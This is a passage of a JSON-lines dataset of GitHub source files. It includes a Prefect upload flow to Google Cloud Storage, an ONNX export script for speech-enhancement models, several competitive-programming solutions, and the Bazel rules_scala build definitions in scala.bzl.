merge()\n","repo_name":"kipoi/kipoi-veff2","sub_path":"kipoi_veff2/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31495225947","text":"# import required libraries\nimport io\nimport pandas as pd\nfrom google.cloud import storage\nfrom prefect import flow, task\n\n# Set up the Google Cloud Storage client\nclient = storage.Client.from_service_account_json('./app/creds.json')\nbucket_name = 'beer_reviews_bucket'\nbucket = client.bucket(bucket_name)\n\n\n\n@task\ndef configure_bucket_exists(bucket):\n \n # Check if the bucket already exists\n if not bucket.exists():\n # Create the bucket\n client.create_bucket(bucket_name)\n bucket = client.bucket(bucket_name)\n print(f\"Bucket {bucket_name} created.\")\n\n\n@task\ndef upload_processed_data(df):\n # create a BytesIO object\n buffer = io.BytesIO()\n \n # save processed data to parquet file\n df.to_parquet(buffer)\n \n # upload data to Google Cloud Storage\n blob = bucket.blob(\"processed_beer_reviews.parquet\")\n blob.upload_from_string(buffer.getvalue())\n \n return \"Data upload complete.\"\n\n@flow()\ndef upload_flow(data):\n configure_bucket_exists(bucket)\n processed_data = upload_processed_data(data) \n return processed_data\n","repo_name":"directdetour/BeerReviewsDataPipeline","sub_path":"flows/upload_flow.py","file_name":"upload_flow.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14328132913","text":"import torch\nimport warnings\nimport onnxruntime\nimport numpy as np\nimport os\nimport torchaudio\nimport argparse\n\nfrom src.speechbraindev.pretrained import SpectralMaskEnhancement\nfrom src.cmgan_onnx import CMGAN_ONNX\n\nwarnings.filterwarnings(\"ignore\")\n\ndef verify(onnx_model_path,\n torch_model,\n dummy_input):\n assert onnx_model_path == None\n assert torch_model == None\n assert dummy_input == None\n print(\"Verifying the exported model...\")\n torch_out = torch_model(dummy_input)\n try:\n ort_session = onnxruntime.InferenceSession(onnx_model_path)\n ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(dummy_input)}\n ort_outs = ort_session.run(None, ort_inputs)\n\n np.testing.assert_allclose(to_numpy(torch_out), ort_outs[0], rtol=1e-03, atol=1e-05)\n print(\"Exported model has been tested with ONNXRuntime, and the result looks good!\")\n except:\n print(\"Something went wrong :'(\")\n\ndef to_numpy(tensor):\n output = tensor.detach().cpu().numpy() if tensor.requires_grad else tensor.cpu().numpy()\n return output\n\ndef metricganp_to_onnx():\n print(\"Creating MetricGAN+ model...\")\n enhance_model = SpectralMaskEnhancement.from_hparams(\n source=\"speechbrain/metricgan-plus-voicebank\",\n savedir=\"pretrained_models/metricgan-plus-voicebank\",\n )\n print(\"Loading dummy input...\")\n dummy_input = enhance_model.load_audio(\"data/dummy_input.wav\")\n dummy_input = dummy_input.unsqueeze(0)\n os.remove(\"dummy_input.wav\")\n print('Exporting to ONNX Model...')\n torch.onnx.export(enhance_model, \n dummy_input, \n \"metricganp.onnx\",\n export_params=True,\n opset_version=15,\n input_names = ['input'],\n output_names = ['output'],\n dynamic_axes={'input' : {0 : 'batch_size'},\n 'output' : {0 : 'batch_size'}})\n print(\"Model has been exported to ONNX!\")\n verify(\"metricganp.onnx\", enhance_model, dummy_input)\n\ndef cmgan_to_onnx():\n checkpoint_path = \"./pretrained_models/CMGAN/cmgan_ckpt\"\n dummy_input_path = \"./data/noisy_sample_16k.wav\"\n print(\"Creating Conformer-based GAN model...\")\n cmgan_onnx_model = CMGAN_ONNX(checkpoint_path=checkpoint_path,\n device_id=None)\n print(\"Loading dummy input...\")\n dummy_input, sr = torchaudio.load(dummy_input_path)\n assert sr == 16000\n # torch_out = cmgan_onnx_model(dummy_input)\n\n # exit()\n print('Exporting to ONNX Model...')\n torch.onnx.export(cmgan_onnx_model, \n dummy_input, \n \"cmgan.onnx\",\n export_params=True,\n opset_version=11,\n input_names = ['input'],\n output_names = ['output'],\n dynamic_axes={'input' : {0 : 'batch_size'},\n 'output' : {0 : 'batch_size'}})\n print(\"Model has been exported to ONNX!\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, help=\"cmgan or metricganp\", default=\"cmgan\")\n args = parser.parse_args()\n print(\"+------------------------------+\")\n print(\"| TonSpeech |\")\n print(\"| Export to ONNX Model |\")\n print(\"+------------------------------+\")\n \n if args.model == \"cmgan\":\n cmgan_to_onnx()\n elif args.model == \"metricganp\":\n metricganp_to_onnx()\n else:\n print(\"Unsupported model was found!\")","repo_name":"tungedng2710/TonSpeech","sub_path":"onnx.py","file_name":"onnx.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"3138682401","text":"class Solution:\n def findMaximizedCapital(self, k: int, w: int, profits: List[int], capital: List[int]) -> int:\n cp = sorted(zip(capital, profits), reverse= True)\n hp = []\n while k:\n while cp and cp[-1][0] <= w:\n c, p = cp.pop()\n heapq.heappush(hp, -p)\n if not hp:\n break\n w -= heapq.heappop(hp)\n k -= 1\n return w\n","repo_name":"fish-ball/leetcode","sub_path":"algorithms/leet.0502.src.1.py","file_name":"leet.0502.src.1.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9957711357","text":"H,W,C,Q = [int(x) for x in input().split()]\n\nh_dict = {}\nv_dict = {}\n\ncolor_count = {\n x: 0 for x in range(1, C+1)\n}\n\ntnc = []\n\nfor _ in range(Q):\n tnc.append([int(x) for x in input().split()])\n\n\nfor t,n,c in tnc[::-1]:\n if t == 1:\n if n not in h_dict:\n h_dict[n] = c\n color_count[c] += W - len(v_dict)\n\n if t == 2:\n if n not in v_dict:\n v_dict[n] = c\n color_count[c] += H - len(h_dict)\n\nprint(' '.join([str(color_count[i]) for i in range(1,C+1)]))","repo_name":"barnrang/Pro-con","sub_path":"Atcoder/Regular-130/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73896838227","text":"import sys\nfrom numpypy import *\n\n\ndef kadane(array, width):\n # kadane's dynamic programming algorithm\n maxL, maxR, maxSum = -1, -1, 0\n currL, currR, currSum = 0, 0, 0\n for i, a in enumerate(array):\n if a != width or currSum + a < a:\n currL, currR, currSum = i + 1, i + 1, 0\n else:\n currR, currSum = i + 1, currSum + a\n if maxSum < currSum:\n maxL, maxR, maxSum = currL, currR, currSum\n return maxL, maxR, maxSum\n\n\ndef solve(par):\n S, B, blocks = par\n mat = ones((S + 1, S + 1), dtype=byte)\n for i in range(S + 1):\n mat[i, 0] = mat[0, i] = 0\n for bloc in blocks:\n i1, j1, i2, j2 = bloc\n for i in range(i1, i2 + 1):\n for j in range(j1, j2 + 1):\n mat[i, j] = 0\n\n memo = zeros((S + 1, S + 1), dtype=byte) # store the sum of upperleft\n for j in range(1, S + 1):\n if mat[1, j] == 1:\n memo[1, j] = 1\n for i in range(1, S + 1):\n if mat[i, j] == 1:\n memo[i, j] = 1 + memo[i - 1, j]\n else:\n memo[i, j] = memo[i - 1, j]\n\n currMax = -1\n for i in range(0, S):\n for j in range(i, S + 1):\n array = []\n for k in range(1, S + 1):\n array.append(memo[j, k] - memo[i, k])\n maxL, maxR, maxSum = kadane(array, j - i)\n if maxSum > currMax:\n currMax = maxSum\n # print(i, maxL, j, maxR, maxSum)\n return currMax\n\n\nif __name__ == '__main__':\n sys.stdin = open('input.txt', 'r')\n numTests = int(input())\n for itertest in range(numTests):\n S = int(input())\n B = int(input())\n blocks = []\n for i in range(B):\n blocks.append(map(int, raw_input().split()))\n\n print(solve((S, B, blocks)))\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 10667 - Largest Block/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"23208522166","text":"load(\n \"@io_bazel_rules_scala//scala/private:rule_impls.bzl\",\n _scala_binary_impl = \"scala_binary_impl\",\n _scala_junit_test_impl = \"scala_junit_test_impl\",\n _scala_library_for_plugin_bootstrapping_impl = \"scala_library_for_plugin_bootstrapping_impl\",\n _scala_library_impl = \"scala_library_impl\",\n _scala_macro_library_impl = \"scala_macro_library_impl\",\n _scala_repl_impl = \"scala_repl_impl\",\n _scala_test_impl = \"scala_test_impl\",\n)\nload(\n \"@io_bazel_rules_scala//scala/private:coverage_replacements_provider.bzl\",\n _coverage_replacements_provider = \"coverage_replacements_provider\",\n)\nload(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\", \"http_file\")\nload(\n \"@io_bazel_rules_scala//scala:scala_maven_import_external.bzl\",\n _scala_maven_import_external = \"scala_maven_import_external\",\n)\nload(\n \"@io_bazel_rules_scala//scala:scala_cross_version.bzl\",\n _default_scala_version = \"default_scala_version\",\n _default_scala_version_jar_shas = \"default_scala_version_jar_shas\",\n _extract_major_version = \"extract_major_version\",\n _new_scala_default_repository = \"new_scala_default_repository\",\n)\nload(\n \"@io_bazel_rules_scala//specs2:specs2_junit.bzl\",\n _specs2_junit_dependencies = \"specs2_junit_dependencies\",\n)\nload(\n \"@io_bazel_rules_scala//scala:plusone.bzl\",\n _collect_plus_one_deps_aspect = \"collect_plus_one_deps_aspect\",\n)\nload(\n \"@io_bazel_rules_scala//scala:scala_doc.bzl\",\n _scala_doc = \"scala_doc\",\n)\n\n_launcher_template = {\n \"_java_stub_template\": attr.label(\n default = Label(\"@java_stub_template//file\"),\n ),\n}\n\n_implicit_deps = {\n \"_singlejar\": attr.label(\n executable = True,\n cfg = \"host\",\n default = Label(\"@bazel_tools//tools/jdk:singlejar\"),\n allow_files = True,\n ),\n \"_zipper\": attr.label(\n executable = True,\n cfg = \"host\",\n default = Label(\"@bazel_tools//tools/zip:zipper\"),\n allow_files = True,\n ),\n \"_java_toolchain\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_toolchain\"),\n ),\n \"_host_javabase\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_runtime\"),\n cfg = \"host\",\n ),\n \"_java_runtime\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_runtime\"),\n ),\n \"_scalac\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/scalac\",\n ),\n ),\n \"_exe\": attr.label(\n executable = True,\n cfg = \"host\",\n default = Label(\"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/exe:exe\"),\n ),\n}\n\n# Single dep to allow IDEs to pickup all the implicit dependencies.\n_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n_test_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n_junit_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n Label(\"//external:io_bazel_rules_scala/dependency/junit/junit\"),\n Label(\n \"//external:io_bazel_rules_scala/dependency/hamcrest/hamcrest_core\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n# Common attributes reused across multiple rules.\n_common_attrs_for_plugin_bootstrapping = {\n \"srcs\": attr.label_list(allow_files = [\n \".scala\",\n \".srcjar\",\n \".java\",\n ]),\n \"deps\": attr.label_list(aspects = [\n _collect_plus_one_deps_aspect,\n _coverage_replacements_provider.aspect,\n ]),\n \"plugins\": attr.label_list(allow_files = [\".jar\"]),\n \"runtime_deps\": attr.label_list(providers = [[JavaInfo]]),\n \"data\": attr.label_list(allow_files = True),\n \"resources\": attr.label_list(allow_files = True),\n \"resource_strip_prefix\": attr.string(),\n \"resource_jars\": attr.label_list(allow_files = True),\n \"scalacopts\": attr.string_list(),\n \"javacopts\": attr.string_list(),\n \"jvm_flags\": attr.string_list(),\n \"scalac_jvm_flags\": attr.string_list(),\n \"javac_jvm_flags\": attr.string_list(),\n \"expect_java_output\": attr.bool(\n default = True,\n mandatory = False,\n ),\n \"print_compile_time\": attr.bool(\n default = False,\n mandatory = False,\n ),\n}\n\n_common_attrs = {}\n\n_common_attrs.update(_common_attrs_for_plugin_bootstrapping)\n\n_common_attrs.update({\n # using stricts scala deps is done by using command line flag called 'strict_java_deps'\n # switching mode to \"on\" means that ANY API change in a target's transitive dependencies will trigger a recompilation of that target,\n # on the other hand any internal change (i.e. on code that ijar omits) WON’T trigger recompilation by transitive dependencies\n \"_dependency_analyzer_plugin\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//third_party/dependency_analyzer/src/main:dependency_analyzer\",\n ),\n allow_files = [\".jar\"],\n mandatory = False,\n ),\n \"unused_dependency_checker_mode\": attr.string(\n values = [\n \"warn\",\n \"error\",\n \"off\",\n \"\",\n ],\n mandatory = False,\n ),\n \"_unused_dependency_checker_plugin\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//third_party/unused_dependency_checker/src/main:unused_dependency_checker\",\n ),\n allow_files = [\".jar\"],\n mandatory = False,\n ),\n \"unused_dependency_checker_ignored_targets\": attr.label_list(default = []),\n \"_code_coverage_instrumentation_worker\": attr.label(\n default = \"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/coverage/instrumenter\",\n allow_files = True,\n executable = True,\n cfg = \"host\",\n ),\n})\n\n_library_attrs = {\n \"main_class\": attr.string(),\n \"exports\": attr.label_list(\n allow_files = False,\n aspects = [_coverage_replacements_provider.aspect],\n ),\n}\n\n_common_outputs = {\n \"jar\": \"%{name}.jar\",\n \"deploy_jar\": \"%{name}_deploy.jar\",\n \"manifest\": \"%{name}_MANIFEST.MF\",\n \"statsfile\": \"%{name}.statsfile\",\n}\n\n_library_outputs = {}\n\n_library_outputs.update(_common_outputs)\n\n_scala_library_attrs = {}\n\n_scala_library_attrs.update(_implicit_deps)\n\n_scala_library_attrs.update(_common_attrs)\n\n_scala_library_attrs.update(_library_attrs)\n\n_scala_library_attrs.update(_resolve_deps)\n\nscala_library = rule(\n attrs = _scala_library_attrs,\n fragments = [\"java\"],\n outputs = _library_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_library_impl,\n)\n\n# the scala compiler plugin used for dependency analysis is compiled using `scala_library`.\n# in order to avoid cyclic dependencies `scala_library_for_plugin_bootstrapping` was created for this purpose,\n# which does not contain plugin related attributes, and thus avoids the cyclic dependency issue\n_scala_library_for_plugin_bootstrapping_attrs = {}\n\n_scala_library_for_plugin_bootstrapping_attrs.update(_implicit_deps)\n\n_scala_library_for_plugin_bootstrapping_attrs.update(_library_attrs)\n\n_scala_library_for_plugin_bootstrapping_attrs.update(_resolve_deps)\n\n_scala_library_for_plugin_bootstrapping_attrs.update(\n _common_attrs_for_plugin_bootstrapping,\n)\n\nscala_library_for_plugin_bootstrapping = rule(\n attrs = _scala_library_for_plugin_bootstrapping_attrs,\n fragments = [\"java\"],\n outputs = _library_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_library_for_plugin_bootstrapping_impl,\n)\n\n_scala_macro_library_attrs = {\n \"main_class\": attr.string(),\n \"exports\": attr.label_list(allow_files = False),\n}\n\n_scala_macro_library_attrs.update(_implicit_deps)\n\n_scala_macro_library_attrs.update(_common_attrs)\n\n_scala_macro_library_attrs.update(_library_attrs)\n\n_scala_macro_library_attrs.update(_resolve_deps)\n\n# Set unused_dependency_checker_mode default to off for scala_macro_library\n_scala_macro_library_attrs[\"unused_dependency_checker_mode\"] = attr.string(\n default = \"off\",\n values = [\n \"warn\",\n \"error\",\n \"off\",\n \"\",\n ],\n mandatory = False,\n)\n\nscala_macro_library = rule(\n attrs = _scala_macro_library_attrs,\n fragments = [\"java\"],\n outputs = _common_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_macro_library_impl,\n)\n\n_scala_binary_attrs = {\n \"main_class\": attr.string(mandatory = True),\n \"classpath_resources\": attr.label_list(allow_files = True),\n}\n\n_scala_binary_attrs.update(_launcher_template)\n\n_scala_binary_attrs.update(_implicit_deps)\n\n_scala_binary_attrs.update(_common_attrs)\n\n_scala_binary_attrs.update(_resolve_deps)\n\nscala_binary = rule(\n attrs = _scala_binary_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = _common_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_binary_impl,\n)\n\n_scala_test_attrs = {\n \"main_class\": attr.string(\n default = \"io.bazel.rulesscala.scala_test.Runner\",\n ),\n \"suites\": attr.string_list(),\n \"colors\": attr.bool(default = True),\n \"full_stacktraces\": attr.bool(default = True),\n \"_scalatest\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ),\n \"_scalatest_runner\": attr.label(\n cfg = \"host\",\n default = Label(\"//src/java/io/bazel/rulesscala/scala_test:runner\"),\n ),\n \"_scalatest_reporter\": attr.label(\n default = Label(\"//scala/support:test_reporter\"),\n ),\n \"_jacocorunner\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:JacocoCoverage\"),\n ),\n \"_lcov_merger\": attr.label(\n default = Label(\"@bazel_tools//tools/test/CoverageOutputGenerator/java/com/google/devtools/coverageoutputgenerator:Main\"),\n ),\n}\n\n_scala_test_attrs.update(_launcher_template)\n\n_scala_test_attrs.update(_implicit_deps)\n\n_scala_test_attrs.update(_common_attrs)\n\n_scala_test_attrs.update(_test_resolve_deps)\n\nscala_test = rule(\n attrs = _scala_test_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = _common_outputs,\n test = True,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_test_impl,\n)\n\n_scala_repl_attrs = {}\n\n_scala_repl_attrs.update(_launcher_template)\n\n_scala_repl_attrs.update(_implicit_deps)\n\n_scala_repl_attrs.update(_common_attrs)\n\n_scala_repl_attrs.update(_resolve_deps)\n\nscala_repl = rule(\n attrs = _scala_repl_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = _common_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_repl_impl,\n)\n\ndef _default_scala_extra_jars():\n return {\n \"2.11\": {\n \"scalatest\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"2aafeb41257912cbba95f9d747df9ecdc7ff43f039d35014b4c2a8eb7ed9ba2f\",\n },\n \"scalactic\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"84723064f5716f38990fe6e65468aa39700c725484efceef015771d267341cf2\",\n },\n \"scala_xml\": {\n \"version\": \"1.0.5\",\n \"sha256\": \"767e11f33eddcd506980f0ff213f9d553a6a21802e3be1330345f62f7ee3d50f\",\n },\n \"scala_parser_combinators\": {\n \"version\": \"1.0.4\",\n \"sha256\": \"0dfaafce29a9a245b0a9180ec2c1073d2bd8f0330f03a9f1f6a74d1bc83f62d6\",\n },\n },\n \"2.12\": {\n \"scalatest\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"b416b5bcef6720da469a8d8a5726e457fc2d1cd5d316e1bc283aa75a2ae005e5\",\n },\n \"scalactic\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"57e25b4fd969b1758fe042595112c874dfea99dca5cc48eebe07ac38772a0c41\",\n },\n \"scala_xml\": {\n \"version\": \"1.0.5\",\n \"sha256\": \"035015366f54f403d076d95f4529ce9eeaf544064dbc17c2d10e4f5908ef4256\",\n },\n \"scala_parser_combinators\": {\n \"version\": \"1.0.4\",\n \"sha256\": \"282c78d064d3e8f09b3663190d9494b85e0bb7d96b0da05994fe994384d96111\",\n },\n },\n }\n\ndef scala_repositories(\n scala_version_shas = (\n _default_scala_version(),\n _default_scala_version_jar_shas(),\n ),\n maven_servers = [\"http://central.maven.org/maven2\"],\n scala_extra_jars = _default_scala_extra_jars()):\n (scala_version, scala_version_jar_shas) = scala_version_shas\n major_version = _extract_major_version(scala_version)\n\n _new_scala_default_repository(\n maven_servers = maven_servers,\n scala_version = scala_version,\n scala_version_jar_shas = scala_version_jar_shas,\n )\n\n scala_version_extra_jars = scala_extra_jars[major_version]\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scalatest\",\n artifact = \"org.scalatest:scalatest_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scalatest\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scalatest\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scalactic\",\n artifact = \"org.scalactic:scalactic_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scalactic\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scalactic\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scala_xml\",\n artifact = \"org.scala-lang.modules:scala-xml_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scala_xml\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scala_xml\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scala_parser_combinators\",\n artifact =\n \"org.scala-lang.modules:scala-parser-combinators_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scala_parser_combinators\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scala_parser_combinators\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n # used by ScalacProcessor\n _scala_maven_import_external(\n name = \"scalac_rules_commons_io\",\n artifact = \"commons-io:commons-io:2.6\",\n jar_sha256 = \"f877d304660ac2a142f3865badfc971dec7ed73c747c7f8d5d2f5139ca736513\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_guava\",\n artifact = \"com.google.guava:guava:21.0\",\n jar_sha256 = \"972139718abc8a4893fa78cba8cf7b2c903f35c97aaf44fa3031b0669948b480\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_org_jacoco_org_jacoco_core\",\n artifact = \"org.jacoco:org.jacoco.core:0.7.5.201505241946\",\n jar_sha256 = \"ecf1ad8192926438d0748bfcc3f09bebc7387d2a4184bb3a171a26084677e808\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_org_ow2_asm_asm_debug_all\",\n artifact = \"org.ow2.asm:asm-debug-all:5.0.1\",\n jar_sha256 = \"4734de5b515a454b0096db6971fb068e5f70e6f10bbee2b3bd2fdfe5d978ed57\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n # Using this and not the bazel regular one due to issue when classpath is too long\n # until https://github.com/bazelbuild/bazel/issues/6955 is resolved\n if not native.existing_rule(\"java_stub_template\"):\n http_archive(\n name = \"java_stub_template\",\n sha256 = \"1859a37dccaee8c56b98869bf1f22f6f5b909606aff74ddcfd59e9757a038dd5\",\n urls = [\"https://github.com/bazelbuild/rules_scala/archive/8b8271e3ee5709e1340b19790d0b396a0ff3dd0f.tar.gz\"],\n strip_prefix = \"rules_scala-8b8271e3ee5709e1340b19790d0b396a0ff3dd0f/java_stub_template\",\n )\n\n if not native.existing_rule(\"com_google_protobuf\"):\n http_archive(\n name = \"com_google_protobuf\",\n sha256 = \"d82eb0141ad18e98de47ed7ed415daabead6d5d1bef1b8cccb6aa4d108a9008f\",\n strip_prefix = \"protobuf-b4f193788c9f0f05d7e0879ea96cd738630e5d51\",\n # Commit from 2019-05-15, update to protobuf 3.8 when available.\n url = \"https://github.com/protocolbuffers/protobuf/archive/b4f193788c9f0f05d7e0879ea96cd738630e5d51.tar.gz\",\n )\n\n if not native.existing_rule(\"zlib\"): # needed by com_google_protobuf\n http_archive(\n name = \"zlib\",\n build_file = \"@com_google_protobuf//:third_party/zlib.BUILD\",\n sha256 = \"c3e5e9fdd5004dcb542feda5ee4f0ff0744628baf8ed2dd5d66f8ca1197cb1a1\",\n strip_prefix = \"zlib-1.2.11\",\n urls = [\"https://zlib.net/zlib-1.2.11.tar.gz\"],\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/com_google_protobuf/protobuf_java\",\n actual = \"@com_google_protobuf//:protobuf_java\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/commons_io/commons_io\",\n actual = \"@scalac_rules_commons_io//jar\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scalatest/scalatest\",\n actual = \"@io_bazel_rules_scala//scala/scalatest:scalatest\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_compiler\",\n actual = \"@io_bazel_rules_scala_scala_compiler\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_library\",\n actual = \"@io_bazel_rules_scala_scala_library\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_reflect\",\n actual = \"@io_bazel_rules_scala_scala_reflect\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_xml\",\n actual = \"@io_bazel_rules_scala_scala_xml\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/parser_combinators\",\n actual = \"@io_bazel_rules_scala_scala_parser_combinators\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/guava\",\n actual = \"@io_bazel_rules_scala_guava\",\n )\n\ndef _sanitize_string_for_usage(s):\n res_array = []\n for idx in range(len(s)):\n c = s[idx]\n if c.isalnum() or c == \".\":\n res_array.append(c)\n else:\n res_array.append(\"_\")\n return \"\".join(res_array)\n\n# This auto-generates a test suite based on the passed set of targets\n# we will add a root test_suite with the name of the passed name\ndef scala_test_suite(\n name,\n srcs = [],\n visibility = None,\n use_short_names = False,\n **kwargs):\n ts = []\n i = 0\n for test_file in srcs:\n i = i + 1\n n = (\"%s_%s\" % (name, i)) if use_short_names else (\"%s_test_suite_%s\" % (name, _sanitize_string_for_usage(test_file)))\n scala_test(\n name = n,\n srcs = [test_file],\n visibility = visibility,\n unused_dependency_checker_mode = \"off\",\n **kwargs\n )\n ts.append(n)\n native.test_suite(name = name, tests = ts, visibility = visibility)\n\n# Scala library suite generates a series of scala libraries\n# then it depends on them with a meta one which exports all the sub targets\ndef scala_library_suite(\n name,\n srcs = [],\n exports = [],\n visibility = None,\n **kwargs):\n ts = []\n for src_file in srcs:\n n = \"%s_lib_%s\" % (name, _sanitize_string_for_usage(src_file))\n scala_library(\n name = n,\n srcs = [src_file],\n visibility = visibility,\n exports = exports,\n unused_dependency_checker_mode = \"off\",\n **kwargs\n )\n ts.append(n)\n scala_library(\n name = name,\n visibility = visibility,\n exports = exports + ts,\n deps = ts,\n )\n\n_scala_junit_test_attrs = {\n \"prefixes\": attr.string_list(default = []),\n \"suffixes\": attr.string_list(default = []),\n \"suite_label\": attr.label(\n default = Label(\n \"//src/java/io/bazel/rulesscala/test_discovery:test_discovery\",\n ),\n ),\n \"suite_class\": attr.string(\n default = \"io.bazel.rulesscala.test_discovery.DiscoveredTestSuite\",\n ),\n \"print_discovered_classes\": attr.bool(\n default = False,\n mandatory = False,\n ),\n \"_junit\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/junit/junit\",\n ),\n ),\n \"_hamcrest\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/hamcrest/hamcrest_core\",\n ),\n ),\n \"_bazel_test_runner\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//scala:bazel_test_runner_deploy\",\n ),\n allow_files = True,\n ),\n}\n\n_scala_junit_test_attrs.update(_launcher_template)\n\n_scala_junit_test_attrs.update(_implicit_deps)\n\n_scala_junit_test_attrs.update(_common_attrs)\n\n_scala_junit_test_attrs.update(_junit_resolve_deps)\n\n_scala_junit_test_attrs.update({\n \"tests_from\": attr.label_list(providers = [[JavaInfo]]),\n})\n\nscala_junit_test = rule(\n attrs = _scala_junit_test_attrs,\n fragments = [\"java\"],\n outputs = _common_outputs,\n test = True,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_junit_test_impl,\n)\n\ndef scala_specs2_junit_test(name, **kwargs):\n scala_junit_test(\n name = name,\n deps = _specs2_junit_dependencies() + kwargs.pop(\"deps\", []),\n unused_dependency_checker_ignored_targets =\n _specs2_junit_dependencies() + kwargs.pop(\"unused_dependency_checker_ignored_targets\", []),\n suite_label = Label(\n \"//src/java/io/bazel/rulesscala/specs2:specs2_test_discovery\",\n ),\n suite_class = \"io.bazel.rulesscala.specs2.Specs2DiscoveredTestSuite\",\n **kwargs\n )\n\nscala_doc = _scala_doc","repo_name":"mackenziestarr/rules_scala","sub_path":"scala/scala.bzl","file_name":"scala.bzl","file_ext":"bzl","file_size_in_byte":23337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} 